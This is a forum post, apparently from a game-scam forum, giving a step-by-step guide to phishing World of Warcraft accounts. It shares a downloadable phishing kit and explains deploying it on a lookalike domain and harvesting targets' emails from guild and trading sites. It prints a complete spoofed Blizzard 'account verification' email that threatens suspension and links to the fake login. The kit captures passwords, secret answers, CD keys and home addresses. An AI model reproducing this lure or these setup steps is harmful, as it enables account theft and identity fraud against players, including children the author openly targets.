UPDATES:
Version 2
I forgot that I left out half the images on the website, so I went back and ripped them from world of warcraft. So now it looks a little more official.
Also cleaned up the words to make it seem like it was written by blizzard.
I also got the images from world of warcraft for the log in page. So you don't have to worry about your site going down when world of warcraft's website goes down.
I forgot the css sheet when I uploaded the original file and so I put that in.
Just make sure you upload the CSS files as well when you upload your website.
I would make the fields required but the only way I know is with java and if your using something that doesn't allow java to be enabled then you're screwed anyway. So if you want to make the fields required or have another way of doing it go for it.
Version 3
I added lines for their Address, City, State, Zip Code, and Country.
I also fixed the TXT and HTML problem.
I made the required fields actually require input. So there are now error pages when they do not put in the information in the required fields.
Sometimes the image for the security block wasn't showing up from woweurope.com so I downloaded one and that one will stay constant. So the security block image will not change now (sorry, if you want the one that pulls the images from woweurope.com PM me and I'll help you change it.)
Added an HTACCESS file for those who want to block certain IP addresses from their website. So say you got an annoying little @$$ that figured out it was a scam and just keeps putting obscenities in the fields. Just open up HTACCESS and make it look like this:
order allow,deny
deny from 69.29.66.57
allow from all
You can add as many deny lines for as many IP addresses as you want. It will keep those people from coming back to your site. (BTW you can find their IP address in your WoWLogs.html)
I also added more Secret Questions so now I think I have gotten all the Secret Questions, EU and US and old ones that they don't use anymore.
If you find any Secret Questions that aren't listed on the website send me a PM of the question and I will add it.
*************************************************************
*************************************************************
WEBSITE PHISHER GUIDE:
Ok, so, I've been browsing the scam forums for a while now.
I originally joined for the WoW Hacks, but scamming has taken my interest.
So I've tried a few scams such as the [email protected] or something and then telling them they need to send all this info for verification.
Well that only worked about 2/14 for me.
So I wanted to try the website phishing scam, but that only gets you the account name and password. (I was using Darkninja's log in phisher)
So I figured out a way that you can get all the information you need to take the account.
Things you'll be doing:
Setting up a website
E-mailing with fake e-mailer
Reaping the rewards
STEP 1:
You'll need to download my website scam package here:
MEGAUPLOAD Mirror WoWScamV3.zip
or
TURBOUPLOAD Mirror WoWScamV3.zip
or
FILEQUBE Mirror WoWScamV3.zip
Then you need to uninstall it somewhere on your computer (Just remember where you put it).
STEP 2:
You need to find a free php enabled hosting website, or if you want to pay for the hosting be my guest.
Preferably one without ads, ads are a dead give away to a scam.
I personally use lhosting.info for my website scamming, but if you can find better, go for it.
Also, try checking here for hosts:
free web hosting with no forced ads
And you need to go through all the steps of signing up for the website.
Try and make it look legit, like worldofwarcraft.tk or something.
Just incase someone takes a quick glance at the URL they won't immediately see it as something else.
Something else you can do is go to a URL redirection service like dot.tk and make it look official like worldofwarcraftlogin.tk
STEP 3:
Experienced website designers should have no problem with this part.
Now you need to go to the file management page of the website you just signed up for.
You need to make an "/images" directory.(Don't use the parentheses or the slash when naming your directory)
Then inside the "/images" directory you need to make two more directories, "/en" and "/subheader"
Next you need to upload the HTML, PHP, and TXT documents to the root directory.
Then go to images and upload all the images located in the "images" folder of my package.
Do the same for "en" and "subheader" into the right directories.
You might also want to change Index.html to index.html because of case sensitivity.
Just be aware that you are using your capitalization right when using the html files.
Note:
You MAY (If it's all in the same directory don't worry about it) need to open up both engine.php and wowengine.php in notepad and change this line:
WOWENGINE.PHP
header( 'Location: Success.html' );
Change to:
header( 'Location: Thelocationofyoursuccess.html' );
ENGINE.PHP
Change to:header( 'Location: Identity_Verification.html' );
header( 'Location: Thelocationofyouridentity_verification.html' );
This is what it should look like when you are done
Log in page
Log in page error
Verify page
Verify page
Verify page error
Success page
IF YOU ARE HAVING TROUBLE SETTING UP YOUR WEBSITE PHISHER REFER TO THIS LINK:
http://www.mmowned.com/forums/wow-sc...-pictures.html
STEP 4:
Congratulations you just created a phishing website that will get you the Account Name, Account Password,
First and Last Name on the account, E-mail Address associated with the account, SQ/A, WoW and TBC CD Keys,
and any excuse the poor sap comes up with. Now you need to get this website out there to scam some poor
kids out of their account. Go to an account trading/selling website.
Find someone who is foolish enough to put their e-mail to contact them with.
Or you can find a guild website and look through the members to see if they put their e-mail up.
Now all you have to do is go to:
Evil Page
and fill out the form like this:
From: [email protected]
To: YOURTARGETEMAILGOESHERE
Subject: World of Warcraft - Account Verification
Greetings,
<br><br>
An investigation of your World of Warcraft account has found strong evidence that the account in question is being sold or traded.
As you may not be aware of, this conflicts with Blizzard's EULA under section 4 Paragraph B which can be found here:
<a href=http://www.worldofwarcraft.com/legal/eula.html target="_blank"> WoW -> Legal -> End User License Agreement </a>
<br>
and Section 8 of the Terms of Use found here: <br>
<a href=http://www.worldofwarcraft.com/legal/termsofuse.htmltarget="_blank"> WoW -> Legal -> Terms of Use</a><br><br>
The investigation will be continued by Blizzard administration to determine the action to be taken against your account.
If your account is found violating the EULA and Terms of Use, your account can, and will be suspended/closed/or terminated. <br>
In order to keep this from occurring, you should immediately verify that you are the original owner of the account.
<br><br>
To verify your identity please visit the following webpage: <br>
<a href=YOUR SITE HERE target="_blank">https://www.worldofwarcraft.com/login/login?service=https%3A%2F%2Fwww.worldofwarcraft.com%2Faccount%2Findex.html</a><br>
Only Account Administration will be able to assist with account retrieval issues.
Thank you for your time and attention to this matter, and your continued interest in World of Warcraft. <br>
<br><br>
Sincerely,
<br><br>
Account Administration<br>
Blizzard Entertainment<br>
<a href= http://us.blizzard.com/support/article/21505 target="_blank">
</a>
STEP 5:
Stand back and watch the accounts come flying in.
To access them just go to your website and check the SQAlogs.html and the WoWlogs.html for the information.
Wrap Up:
Ok so this is what you did.
You set up a website that gets the:
account name
account password
first and last name
secret question and answer
wow cd keys
address
city
state
zip code
You used a fake e-mailer to make it look official from Blizz.
They go to the website, and enter in the information.
The website redirects them to WorldofWarcraft.com after they are done "Verifying" who they are.
You check your logs for the info and viola!
Additional Notes:
I am not a PHP expert by any means and if you want to you can add a file input line on the verification page that requires a photo ID of the person (This would be an optional project for those who want it.)
Credit goes to darkninja for making the WoW log in page phisher
The rest of the phishing website I did myself.
Feel free to download it and edit however you want.
If you have questions feel free to ask here.